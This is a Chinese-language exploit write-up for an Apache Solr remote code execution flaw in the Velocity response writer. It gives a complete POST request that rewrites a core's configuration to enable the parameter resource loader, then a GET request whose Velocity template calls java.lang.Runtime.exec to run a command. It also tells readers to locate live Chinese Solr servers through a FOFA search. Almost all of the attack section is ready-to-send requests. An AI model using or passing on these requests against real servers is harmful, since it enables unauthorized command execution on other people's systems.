10月31日發現的apache solr的最新漏洞,經過測試該poc真實有效,且危害性高。
漏洞原理:攻擊者可以直接訪問solr控制檯時,可通過發送/節點名/config的post請求對該節點的配置文件進行修改,將Apache solr的params.resource.loader.enabled爲true,這個選項是用來控制是否允許參數資源加載器在Solr請求參數中指定模板,當設置爲true時,將允許用戶通過設置請求中的參數來指定相關資源的加載,所以可以通過該漏洞,在服務器上進行命令執行。
漏洞復現:
在fofa上搜索 app="Solr" && country="CN"
裏面會有大量Solr服務器。
第一步:獲得path路徑:紅框標的就是core的名稱
直接構成post請求,在 /solr/core名稱/config下修改solr.resource.loader.enabled 和 params.resource.loader.enabled 爲true
poc爲:
-------------------------------------------------------------------------------------------------------------------------------------------------
POST /solr/core名稱/config HTTP/1.1
Host:ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 259
{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
-------------------------------------------------------------------------------------------------------------------------------------------------
用exp進行漏洞復現:
GET /solr/core名稱/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: ip:port
Content-Type: application/json
Content-Length: 259
{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
--------
特別鳴謝:山石瞭望